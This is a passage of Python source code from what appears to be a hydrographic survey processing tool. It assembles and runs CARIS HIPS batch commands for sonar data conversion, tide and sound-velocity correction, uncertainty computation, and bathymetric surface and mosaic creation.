os.path.splitext(os.path.split(rawfile)[1])[0] if procfolder == rawfilename: keep_lines.extend([procline]) break print('AM_PM_LineFinder: Found {} lines for the day, running on {} lines'.format(len(self.converted_lines), (len(keep_lines)))) self.converted_lines = keep_lines nav = self.hdcsio_read for hdcsline in self.converted_lines: try: navdata = nav.ReadTimeSeries(hdcsline) lat.append(np.rad2deg(navdata[:, 1].max())) lat.append(np.rad2deg(navdata[:, 1].min())) lon.append(np.rad2deg(navdata[:, 2].max())) lon.append(np.rad2deg(navdata[:, 2].min())) except: raise Exception('Unable to read navigation from line {}'.format(hdcsline)) lat = np.array(lat) lon = np.array(lon) '''if self.coord == 'NAD83': epsg, msg = nad83_epsg_utmzone_finder(lon.max(), lon.min()) elif self.coord == 'WGS84': epsg, msg = wgs84_epsg_utmzone_finder(lon.max(), lon.min()) else: raise Exception("Unknown coordinate system. Please use NAD83 or WGS84.") if msg: with open(self.logger, 'a+') as log: log.write(msg) print msg''' outproj = Proj(init='epsg:' + str(epsg)) inproj = Proj(init='epsg:4326') # WGS84 lowxextent, lowyextent = lon.min(), lat.min() highxextent, highyextent = lon.max(), lat.max() lowxextent_final, lowyextent_final = transform(inproj, outproj, lowxextent, lowyextent) highxextent_final, highyextent_final = transform(inproj, outproj, highxextent, highyextent) return str(epsg), str(lowxextent_final - 2000), str(lowyextent_final - 2000), \ str(highxextent_final + 2000), str(highyextent_final + 2000) def tcari_tides(self, tcarifile, mode): if _TCARI_CONVERTED: count = 0 fstr = '' pre_msgs = [] post_msgs = [] lines = self.converted_lines tc = TCARI.LoadTCARIFile(tcarifile) tidetypes = {"Observed": tidestation.TideStation.OBSERVED, "Verified": tidestation.TideStation.VERIFIED, "Predicted": tidestation.TideStation.GENERATED} tidetype = tidetypes[mode] if lines: with open(self.logger, 'a+') as log: startmsg = '*******Running TCARI Tide Processor*******\r\n' print(startmsg) log.write(startmsg) # tidetype = self.tcaridata.ChooseTideTypeIfMultiple(self) nav = HDCSio.HDCSNav('Navigation') times = [] remove_paths = [] for path in lines: try: o = nav.ReadTimeSeries(path) if len(o) > 0: times.append([o[:, 0].min(), o[:, 0].max()]) except: msg = "Error reading data from:'%s'\nRemoving path '%s'\n" % (path, path) print(msg) log.write(msg) remove_paths.append(path) pre_msgs.append(msg) count += 1 for path in remove_paths: lines.remove(path) if times: if tidetype != tidestation.TideStation.GENERATED: t = np.array(times, np.float64) mintime, maxtime = UTCs80ToDateTime(t[:, 0].min()), UTCs80ToDateTime(t[:, 1].max()) begindate = mintime - datetime.timedelta(360. / (24 * 60)) enddate = maxtime + datetime.timedelta(360. / (24 * 60)) # add buffer for AutoQC, as pos files could exist outside of caris min/max time begindate -= datetime.timedelta(hours=3) enddate += datetime.timedelta(hours=3) thr = threading.Thread(target=tc.DownloadWLData, kwargs={ 'begindate': begindate, 'enddate': enddate, 'tidetype': tidetype, 'bShowProgress': False}) thr.start() while thr.isAlive(): if self.progressbar: self.progressbar.UpdatePulse('Running Pydro TCARI') time.sleep(.1) bPred = False else: bPred = True automation_args = [] thr = threading.Thread(target=TCARI.TideCorrectHDCS, args=(tc, lines), kwargs={ 'bPredicted': bPred, 'tidetype': tidetype, 'bShowLog': False, 'bWarnOutOfGrid': False, 'automation_args': automation_args}) thr.start() while thr.isAlive(): if self.progressbar: self.progressbar.UpdatePulse('Running Pydro TCARI') time.sleep(.1) try: fstr = automation_args[0] tcnt = automation_args[1] except: pass else: count += tcnt else: print(("Caris navigation data missing. \n" + "Either the files could not be read or the data was corrupt.")) if fstr: tcaris_msgs = open(fstr, "rb").read() else: h, fstr = tempfile.mkstemp('.log.txt', 'TC_') os.close(h) tcaris_msgs = "" outf = open(fstr, 'wb') outf.write("\n".join(pre_msgs)) outf.write(tcaris_msgs) outf.write("\n".join(post_msgs)) outf.close() log.write("\n".join(pre_msgs)) log.write(tcaris_msgs) log.write("\n".join(post_msgs)) if count > 0: print() "There were errors or warnings in creating the HDCS tides.\nSee the Charlene caris_log file for more information." endmsg = '*******TCARI Tide Processor Complete*******\r\n' print(endmsg) log.write(endmsg) TCARI.SaveTCARIFile(tc, tcarifile) return fstr else: raise NotImplementedError("TCARI is not in Python 3 yet") def convert_sss(self, raw_file, overwrite=False): '''Runs ImporttoHIPS with all options. Example: carisbatch.exe --run ImportToHIPS --input-format KLEIN --convert-side-scan HIGH --pressure-sensor-psi 300 --pressure-sensor-range 05 C:\HIPSData\PreProcess\000_1111.HSX file:///C:/HIPSData/HDCS_Data/Test/Test.hips?Vessel=HypackVessel2017;Day=2017-006''' epsg = proj_to_epsg(self.coord, self.proj) rawfiles = '' if self.hipsversion < 11: hdcspath = os.path.join(self.hdcs_folder, self.sheet_name, self.vessel_name, self.day_num) else: hdcspath = os.path.join(self.hdcs_folder, self.sheet_name) for line in raw_file: rawfiles += '"' + line + '" ' tempraw = os.path.split(line)[1] line_path = os.path.join(hdcspath, tempraw[:len(tempraw) - 4]) self.converted_lines.append(line_path) fullcommand = self.hipscommand + ' --run ImportToHIPS --input-format ' + self.input_format fullcommand += ' --input-crs EPSG:' + epsg if self.hipsversion >= 11: fullcommand += ' --vessel-file "' + self.hvf + '"' if overwrite: fullcommand += ' --overwrite SIDE_SCAN --overwrite NAVIGATION --overwrite MOTION' if self.input_format == 'KLEIN': fullcommand += ' --convert-side-scan HIGH' fullcommand += ' --pressure-sensor-psi 300 --pressure-sensor-range 05 ' elif self.input_format == 'EDGETECH_JSF': fullcommand += ' --sensor-altitude-location SENSOR --convert-from-cable-out' fullcommand += ' --sensor-depth-location SENSOR ' elif self.input_format == 'XTF': fullcommand += ' --convert-side-scan 12 --convert-layback-cable-out CABLEOUT ' elif self.input_format == 'HYPACK_HIGH': fullcommand = self.hipscommand + ' --run ImportToHIPS --input-format HYPACK' fullcommand += ' --input-crs EPSG:' + epsg if self.hipsversion >= 11: fullcommand += ' --vessel-file "' + self.hvf + '"' if overwrite: fullcommand += ' --overwrite SIDE_SCAN --overwrite NAVIGATION --overwrite MOTION' fullcommand += ' --convert-side-scan HIGH --convert-bathymetry NONE --convert-from-cable-out' fullcommand += ' --navigation-device 0 --heading-device 0 --port-device 1 --ss-position-device 2 ' elif self.input_format == 'HYPACK_LOW': fullcommand = self.hipscommand + ' --run ImportToHIPS --input-format HYPACK' fullcommand += ' --input-crs EPSG:' + epsg if self.hipsversion >= 11: fullcommand += ' --vessel-file "' + self.hvf + '"' if overwrite: fullcommand += ' --overwrite SIDE_SCAN --overwrite NAVIGATION --overwrite MOTION' fullcommand += ' --convert-side-scan LOW --convert-bathymetry NONE --convert-from-cable-out' fullcommand += ' --navigation-device 0 --heading-device 0 --port-device 1 --ss-position-device 2 ' fullcommand += rawfiles fullcommand += '"file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips') if self.hipsversion < 11: fullcommand += '?Vessel=' + self.vessel_name + ';Day=' + self.day_num + '"' else: fullcommand += '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def create_beampattern(self, type, bbpfile, querybyline=False): '''Runs CreateSIPSBeamPattern with all the options. Example: carisbatch.exe --run CreateSIPSBeamPattern --mosaic-engine SIPS_BACKSCATTER --beam-pattern-file C:\HIPSData\SIPS\beampatternfile.bbp file:///C:/HIPSData/HDCS_Data/Test/Test.hips''' fullcommand = self.hipscommand + ' --run CreateSIPSBeamPattern --mosaic-engine ' + type fullcommand += ' --beam-pattern-file "' + bbpfile + '" ' fullcommand += '"file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') if querybyline: for line in self.converted_lines: linename = os.path.splitext(os.path.split(line)[1])[0] fullcommand += 'Vessel=' + self.vessel_name + ';Line=' + linename if self.converted_lines.index(line) == (len(self.converted_lines) - 1): # last line fullcommand += '"' else: fullcommand += '&' else: fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def create_mosaic(self, epsg, extentlowx, extentlowy, extenthighx, extenthighy, resolution, beampattern, type, outputname, update=True, querybyline=False): '''Rune CreateSIPSMosaic with all the options. Example: carisbatch.exe --run CreateSIPSMosaic --mosaic-engine SIPS_BACKSCATTER --output-crs EPSG:26919 --extent 300000 5000000 350000 5050000 --resolution 1.0m --beam-pattern-file c:\HIPSData\SIPS\beampattern.bbp file:///C:/HIPSData/HDCS_Data/Test/Test.hips C:\HIPSData\Products\mosaic1m.csar''' fullcommand = self.hipscommand + ' --run CreateSIPSMosaic --mosaic-engine ' + type + ' --output-crs EPSG:' + epsg if not update: fullcommand += ' --beam-pattern-file-operation USE_EXISTING' if type == 'SIPS_SIDESCAN': fullcommand += ' --extrapolate-time 5.0 --beam-pattern BOTH --tvg 10db 10db' if type == 'SIPS_BACKSCATTER': pass fullcommand += ' --extent ' + extentlowx + ' ' + extentlowy + ' ' + extenthighx + ' ' + extenthighy fullcommand += ' --resolution ' + resolution + ' --beam-pattern-file "' + beampattern + '" ' fullcommand += '"file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') if querybyline: for line in self.converted_lines: linename = os.path.splitext(os.path.split(line)[1])[0] fullcommand += 'Vessel=' + self.vessel_name + ';Line=' + linename if self.converted_lines.index(line) == (len(self.converted_lines) - 1): # last line pass else: fullcommand += '&' else: fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num if self.onlysurface_additionalvessel: fullcommand += '&Vessel=' + self.onlysurface_additionalvessel + ';Day=' + self.day_num fullcommand += '"' fullcommand += ' "' + outputname + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def recompute_towfish_nav(self, querybyline=False): '''Runs ComputeSIPSTowfishNavigation with all the options. Example: carisbatch.exe --run ComputeSIPSTowfishNavigation --use-cmg --smooth-sensor GYRO file:///C:/HIPSData/HDCS_Data/Test/Test.hips''' fullcommand = self.hipscommand + ' --run ComputeSIPSTowfishNavigation ' #fullcommand += '--smooth-sensor SSSSensor --smooth-sensor SSSCable --use-cmg ' fullcommand += '"file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') if querybyline: for line in self.converted_lines: linename = os.path.splitext(os.path.split(line)[1])[0] fullcommand += 'Vessel=' + self.vessel_name + ';Line=' + linename if self.converted_lines.index(line) == (len(self.converted_lines) - 1): # last line fullcommand += '"' else: fullcommand += '&' else: fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def import_tide(self, tide_file, zdf=False): '''Runs ImportTideToHIPS with all the options. Example: carisbatch.exe --run ImportTideToHIPS --tide-file C:\HIPSData\Tide\tidefile.tid file:///C:/HIPSData/HDCS_Data/Test/Test.hips''' fullcommand = self.hipscommand + ' --run ImportTideToHIPS --tide-file "' + tide_file + '" ' if zdf: fullcommand += '--interpolation-type MULTI_STATION ' fullcommand += '"file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def import_auxiliary(self, datatype, source, height=None, delheave=None, height_rms=None, delheave_rms=None, nav=None, nav_rms=None, querybyline=False): '''Runs ImportHIPSFromAuxiliary with all the options. Example: carisbatch.exe --run ImportHIPSFromAuziliary --input-format APP_POSMV --allow-partial --delayed-heave 0 --delayed-heave-rms 0 C:\HIPSData\POS\DN170.000 file:///C:/HIPSData/HDCS_Data/Test/Test.hips''' fullcommand = self.hipscommand + ' --run ImportHIPSFromAuxiliary --input-format ' + datatype + ' ' fullcommand += '--allow-partial "' + source + '" ' if height: fullcommand += '--gps-height 0sec ' if height_rms: fullcommand += '--gps-height-rms 0sec ' if delheave: fullcommand += '--delayed-heave 0sec ' if delheave_rms: fullcommand += '--delayed-heave-rms 0sec ' if nav: fullcommand += '--navigation ' if nav_rms: fullcommand += '--navigation-rms 1sec ' if True not in [height, delheave, height_rms, delheave_rms, nav, nav_rms]: print([height, delheave, height_rms, delheave_rms, nav, nav_rms]) print("{} not a valid process type".format(datatype)) fullcommand = '' fullcommand += '"file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') if querybyline: for line in self.converted_lines: linename = os.path.splitext(os.path.split(line)[1])[0] fullcommand += 'Vessel=' + self.vessel_name + ';Line=' + linename if self.converted_lines.index(line) == (len(self.converted_lines) - 1): # last line fullcommand += '"' else: fullcommand += '&' else: fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def svc(self, svp_file, heavesource, select_method): '''Runs SoundVelocityCorrectHIPSWithCARIS with all the options. Example: carisbatch.exe --run SoundVelocityCorrectHIPSWithCARIS --ssp --svp-file C:\HIPSData\SVC\cast.svp --profile-selection-method NEAREST_IN_TIME file:///C:/HIPSData/HDCS_Data/Test/Test.hips?Vessel=Vessel1''' if svp_file: fullcommand = self.hipscommand + ' --run SoundVelocityCorrectHIPSWithCARIS --svp-file "' + svp_file + '"' else: fullcommand = self.hipscommand + ' --run SoundVelocityCorrectHIPSWithCARIS' if select_method == 'NEAREST_IN_DISTANCE' or select_method == 'NEAREST_IN_TIME': fullcommand += ' --profile-selection-method ' + select_method elif select_method == 'NEAREST_IN_DISTANCE_WITHIN': fullcommand += ' --profile-selection-method ' + select_method fullcommand += ' --nearest-distance-hours 4' fullcommand += ' --heave-source "' + heavesource + '" --ssp ' fullcommand += '"file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def compute_gps_tide(self, inputdata, heave_or_delayed, remote_heave=None, waterline=None, vdatum=None, fixed=None): '''Runs ComputeHIPSGPSTide with all the options. Example: carisbatch.exe --run ComputeHIPSGPSTide --datum-separation-type MODEL --datum-model-file c:\HIPSData\Vdatum\vdatum.csar --dynamic-heave DELAYED_HEAVE --mru-remote-heave --antenna-offset --dynamic-draft --waterline REALTIME file:///C:/HIPSData/HDCS_Data/Test/Test.hips''' fullcommand = '' if vdatum: band_name = find_csar_band_name(inputdata, log=self.logger) fullcommand = self.hipscommand + ' --run ComputeHIPSGPSTide --datum-separation-type MODEL' fullcommand += ' --datum-model-file "' + inputdata + '" --dynamic-heave ' + heave_or_delayed fullcommand += ' --datum-model-band "' + band_name + '" --dynamic-draft' if fixed: fullcommand = self.hipscommand + ' --run ComputeHIPSGPSTide --datum-separation-type FIXED' fullcommand += ' --datum-fixed-height "' + inputdata + '" --dynamic-heave ' + heave_or_delayed fullcommand += ' --dynamic-draft' if remote_heave: fullcommand += ' --mru-remote-heave' if waterline: fullcommand += ' --waterline ' + waterline fullcommand += ' "file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def compute_hips_sep_model(self, heave_or_delayed): '''Runs ComputeHIPSSeparationModel with all the options. Example: carisbatch.exe --run ComputeHIPSSeparationModel --datum-separation-type MODEL --datum-model-file c:\HIPSData\Vdatum\vdatum.csar --dynamic-heave DELAYED_HEAVE --mru-remote-heave --antenna-offset --dynamic-draft --waterline REALTIME file:///C:/HIPSData/HDCS_Data/Test/Test.hips''' fullcommand = self.hipscommand + ' --run ComputeHIPSSeparationModel --resolution 10m' fullcommand += '" --dynamic-heave ' + heave_or_delayed fullcommand += ' --mru-remote-heave --antenna-offset --dynamic-draft --waterline REALTIME ' fullcommand += '"file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def merge(self, tide_or_gps, heave_or_delayed): '''Runs MergeHIPS with all the options. Example: carisbatch.exe --run MergeHIPS --tide GPS file:///C:/HIPSData/HDCS_Data/Test/Test.hips''' fullcommand = self.hipscommand + ' --run MergeHIPS --tide ' + tide_or_gps + ' --heave-source ' + heave_or_delayed fullcommand += ' "file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def compute_tpu(self, tide_meas, tide_zone, sv_meas, sv_surf, source, tcari=False, delayed=False, added=None): '''Runs ComputeHIPSTPU with all the options. Example: carisbatch.exe --run ComputeHIPSTPU --tide-measured 1.0m --sv measured 1500m/s --source-heave REALTIME file:///C:/HIPSData/HDCS_Data/Test/Test.hips?Vessel=Vessel1; Day=2017-005''' source_nav = '' source_sonar = '' source_gyro = '' source_pitch = '' source_roll = '' source_heave = '' source_tide = '' if source is "VESSEL": source_nav = "VESSEL" source_sonar = "VESSEL" source_gyro = "VESSEL" source_pitch = "VESSEL" source_roll = "VESSEL" source_heave = "VESSEL" source_tide = "STATIC" elif source is "REALTIME": source_nav = "REALTIME" source_sonar = "REALTIME" source_gyro = "REALTIME" source_pitch = "REALTIME" source_roll = "REALTIME" source_heave = "REALTIME" source_tide = "STATIC" if delayed: source_heave = "DELAYED" if tcari: source_tide = "REALTIME" if added == None: fullcommand = self.hipscommand + ' --run ComputeHIPSTPU --tide-measured ' + tide_meas + ' --tide-zoning ' + tide_zone fullcommand += ' --sv-measured ' + sv_meas + ' --sv-surface ' + sv_surf + ' --source-navigation ' + source_nav fullcommand += ' --source-sonar ' + source_sonar + ' --source-gyro ' + source_gyro + ' --source-pitch ' + source_pitch fullcommand += ' --source-roll ' + source_roll + ' --source-heave ' + source_heave + ' --source-tide ' + source_tide fullcommand += ' "file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) else: finaladded = [] for line in added: justline = os.path.split(line)[1] finaladded.append(justline[:len(justline) - 4]) last = len(finaladded) % 4 iters = len(finaladded) / 4 print('Total lines to Compute TPU = {}'.format(len(finaladded))) print('Running process on {} 4-line blocks'.format(iters)) print('Running final process on {} leftover lines\n'.format(last)) count = 0 while count < iters: fullcommand = self.hipscommand + ' --run ComputeHIPSTPU --tide-measured ' + tide_meas + ' --tide-zoning ' + tide_zone fullcommand += ' --sv-measured ' + sv_meas + ' --sv-surface ' + sv_surf + ' --source-navigation ' + source_nav fullcommand += ' --source-sonar ' + source_sonar + ' --source-gyro ' + source_gyro + ' --source-pitch ' + source_pitch fullcommand += ' --source-roll ' + source_roll + ' --source-heave ' + source_heave + ' --source-tide ' + source_tide fullcommand += ' "file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num + ';Line=' + finaladded[count * 4] fullcommand += '&Line=' + finaladded[count * 4 + 1] + '&Line=' + finaladded[count * 4 + 2] + '&Line=' + \ finaladded[count * 4 + 3] + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) count += 1 fullcommand = self.hipscommand + ' --run ComputeHIPSTPU --tide-measured ' + tide_meas + ' --tide-zoning ' + tide_zone fullcommand += ' --sv-measured ' + sv_meas + ' --sv-surface ' + sv_surf + ' --source-navigation ' + source_nav fullcommand += ' --source-sonar ' + source_sonar + ' --source-gyro ' + source_gyro + ' --source-pitch ' + source_pitch fullcommand += ' --source-roll ' + source_roll + ' --source-heave ' + source_heave + ' --source-tide ' + source_tide fullcommand += ' "file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num if last == 3: fullcommand += ';Line=' + finaladded[count * 4] + '&Line=' + finaladded[count * 4 + 1] + '&Line=' + \ finaladded[count * 4 + 2] + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) if last == 2: fullcommand += ';Line=' + finaladded[count * 4] + '&Line=' + finaladded[count * 4 + 1] + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) if last == 1: fullcommand += ';Line=' + finaladded[count * 4] + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def georef_bathymetry(self, tideopts, svcopts, gpstideopts, mergeopts, tpuopts, querybyline=False): # Only available in Caris 11 and beyond fullcommand = self.hipscommand + ' --run GeoreferenceHIPSBathymetry' if tideopts: if tideopts['file']: fullcommand += ' --tide-file "' + tideopts['file'] + '"' if svcopts: fullcommand += ' --compute-svc --ssp --profile-selection-method ' + svcopts['algorithm'] if svcopts['file']: fullcommand += ' --svp "' + svcopts['file'] + '"' if svcopts['algorithm'] == 'NEAREST_IN_DISTANCE_WITHIN': fullcommand += ' --nearest-distance-hours 4' if gpstideopts: fullcommand += ' --compute-gps-vertical-adjustment' if gpstideopts['method'] == 'VDatum': band_name = find_csar_band_name(gpstideopts['file'], log=self.logger) fullcommand += ' --datum-model-file "' + gpstideopts['file'] + '"' fullcommand += ' --datum-model-band "' + band_name + '"' elif gpstideopts['method'] == 'static_offset': fullcommand += ' --vertical-offset "' + gpstideopts['staticopts'] + '"' fullcommand += ' --vertical-datum-reference ' + mergeopts['vertref'] fullcommand += ' --heave-source ' + mergeopts['heavesrc'] fullcommand += ' --compute-tpu' fullcommand += ' --tide-measured ' + tpuopts['options'][0] + ' --tide-zoning ' + tpuopts['options'][1] fullcommand += ' --sv-measured ' + tpuopts['options'][2] + ' --sv-surface ' + tpuopts['options'][3] fullcommand += ' --source-navigation ' + tpuopts['source']['source_nav'] fullcommand += ' --source-sonar ' + tpuopts['source']['source_sonar'] fullcommand += ' --source-gyro ' + tpuopts['source']['source_gyro'] fullcommand += ' --source-pitch ' + tpuopts['source']['source_pitch'] fullcommand += ' --source-roll ' + tpuopts['source']['source_roll'] fullcommand += ' --source-heave ' + tpuopts['source']['source_heave'] fullcommand += ' --source-tide ' + tpuopts['source']['source_tide'] fullcommand += ' --output-components' fullcommand += ' "file:///' + os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') if querybyline: for line in self.converted_lines: linename = os.path.splitext(os.path.split(line)[1])[0] fullcommand += 'Vessel=' + self.vessel_name + ';Line=' + linename if self.converted_lines.index(line) == (len(self.converted_lines) - 1): # last line fullcommand += '"' else: fullcommand += '&' else: fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def new_hips_surface(self, epsg, extentlowx, extentlowy, extenthighx, extenthighy, resolution, iho, outputname, querybyline=False): '''Runs CreateHIPSGridWithCUBE with all the options. Example: carisbatch.exe --run CreateHIPSGridWithCube --output-crs EPSG:26919 --extent 300000 5000000 350000 5050000 --resolution 1.0m --iho-order S44_1A file:///C:/HIPSData/HDCS_Data/Test/Test.hips C:\HIPSData\Products\CUBE1m.csar''' if resolution == '0.5m': cuberes = 'NOAA_0.5m' elif resolution == '1.0m': cuberes = 'NOAA_1m' elif resolution == '2.0m': cuberes = 'NOAA_2m' elif resolution == '4.0m': cuberes = 'NOAA_4m' elif resolution == '8.0m': cuberes = 'NOAA_8m' elif resolution == '16.0m': cuberes = 'NOAA_16m' else: raise AttributeError('{} Resolution is not supported'.format(resolution)) fullcommand = self.hipscommand + ' --run CreateHIPSGridWithCube --output-crs EPSG:' + epsg + ' --extent ' fullcommand += extentlowx + ' ' + extentlowy + ' ' + extenthighx + ' ' + extenthighy fullcommand += ' --keep-up-to-date' if self.noaa_support_files: fullcommand += ' --cube-config-file="' + self.cubeparams + '" --cube-config-name="' + cuberes + '"' fullcommand += ' --resolution ' + resolution + ' --iho-order ' + iho + ' "file:///' fullcommand += os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') if querybyline: for line in self.converted_lines: linename = os.path.splitext(os.path.split(line)[1])[0] fullcommand += 'Vessel=' + self.vessel_name + ';Line=' + linename if self.converted_lines.index(line) == (len(self.converted_lines) - 1): # last line pass else: fullcommand += '&' else: fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num if self.onlysurface_additionalvessel: fullcommand += '&Vessel=' + self.onlysurface_additionalvessel + ';Day=' + self.day_num fullcommand += '"' fullcommand += ' "' + outputname + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def finalize_hips(self, outputname, minz, maxz, uncertainty='GREATER', applydesignated=True): '''Runs FinalizeRaster with all the options. Example: carisbatch.exe --run FinalizeRaster --filter 10.0m 40.0m --apply-designated --uncertainty-source GREATER C:\HIPSData\Products\CUBE1m.csar C:\HIPSData\Products\CUBE1m_Final.csar''' finalname = outputname[0:len(outputname) - 5] + '_final_' + minz + 'to' + maxz + '.cube' if applydesignated: fullcommand = self.hipscommand + ' --run FinalizeRaster --filter -' + maxz + ' -' + minz + ' --apply-designated ' fullcommand += '--include-band Density --include-band Depth --include-band Hypothesis_Count ' fullcommand += '--include-band Hypothesis_Strength --include-band Mean --include-band Node_Std_Dev ' fullcommand += '--include-band Std_Dev --include-band Uncertainty --include-band User_Nominated ' fullcommand += '--uncertainty-source ' + uncertainty + ' "' + outputname + '" "' + finalname + '"' else: fullcommand = self.hipscommand + ' --run FinalizeRaster --filter -' + maxz + ' -' + minz + ' ' fullcommand += '--include-band Density --include-band Depth --include-band Hypothesis_Count ' fullcommand += '--include-band Hypothesis_Strength --include-band Mean --include-band Node_Std_Dev ' fullcommand += '--include-band Std_Dev --include-band Uncertainty --include-band User_Nominated ' fullcommand += '--uncertainty-source ' + uncertainty + ' "' + outputname + '" "' + finalname + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def new_vr_surface(self, mode, epsg, extentlowx, extentlowy, extenthighx, extenthighy, maxgrid, mingrid, outputname, objrange=False, comprange=False, querybyline=False): '''Runs CreateVRSurface with all the options. Example: carisbatch.exe --run CreateVRSurface --estimation-method CARIS_DENSITY --output-crs EPSG:26919 --extent 300000 5000000 350000 5050000 --max-grid-size 64 --min-grid-size 4 file:///C:/HIPSData/HDCS_Data/Test/Test.hips C:\HIPSData\Products\VR.csar''' depthrange = '' fullcommand = '' if self.noaa_support_files: if comprange: depthrange = self.depth_coverage elif objrange: depthrange = self.depth_object elif mode == 'RANGE': print('No range file selected. Please use the objrange or comprange switch to calculate a RANGE VR surface.') return if mode == 'RANGE': fullcommand = self.hipscommand + ' --run CreateVRSurface --estimation-method ' + mode + ' --output-crs EPSG:' fullcommand += epsg + ' --extent ' + extentlowx + ' ' + extentlowy + ' ' + extenthighx + ' ' + extenthighy if self.noaa_support_files: fullcommand += ' --range-file "' + depthrange fullcommand += '" --keep-partial-bins --input-band DEPTH --max-grid-size ' + maxgrid fullcommand += ' --min-grid-size ' + mingrid + ' --include-flag ACCEPTED "file:///' fullcommand += os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') if querybyline: for line in self.converted_lines: linename = os.path.splitext(os.path.split(line)[1])[0] fullcommand += 'Vessel=' + self.vessel_name + ';Line=' + linename if self.converted_lines.index(line) == (len(self.converted_lines) - 1): # last line pass else: fullcommand += '&' else: fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num if self.onlysurface_additionalvessel: fullcommand += '&Vessel=' + self.onlysurface_additionalvessel + ';Day=' + self.day_num fullcommand += '"' fullcommand += ' "' + outputname + '"' if mode == 'CALDER_RICE': fullcommand = self.hipscommand + ' --run CreateVRSurface --estimation-method ' + mode + ' --output-crs EPSG:' fullcommand += epsg + ' --extent ' + extentlowx + ' ' + extentlowy + ' ' + extenthighx + ' ' + extenthighy fullcommand += ' --finest-resolution 0.10m --coarsest-resolution 16.0m --points-per-cell 15' fullcommand += ' --area SWATH --keep-partial-bins' fullcommand += ' --max-grid-size ' + maxgrid + ' --min-grid-size ' + mingrid + ' --include-flag ACCEPTED "file:///' fullcommand += os.path.join(self.hdcs_folder, self.sheet_name, self.sheet_name + '.hips?') if querybyline: for line in self.converted_lines: linename = os.path.splitext(os.path.split(line)[1])[0] fullcommand += 'Vessel=' + self.vessel_name + ';Line=' + linename if self.converted_lines.index(line) == (len(self.converted_lines) - 1): # last line pass else: fullcommand += '&' else: fullcommand += 'Vessel=' + self.vessel_name + ';Day=' + self.day_num if self.onlysurface_additionalvessel: fullcommand += '&Vessel=' + self.onlysurface_additionalvessel + ';Day=' + self.day_num fullcommand += '"' fullcommand += ' "' + outputname + '"' if self.bench: self.benchclass.run(fullcommand, self.logger, self.benchcsv, self.progressbar) else: self.run_this(fullcommand) def populate_vr_surface(self, mode, iho, outputname, querybyline=False): '''Runs PopulateVRSurface with all the options. Example: carisbatch.exe --run PopulateVRSurface --population-method CUBE --input-band Depth --include-flag ACCEPTED 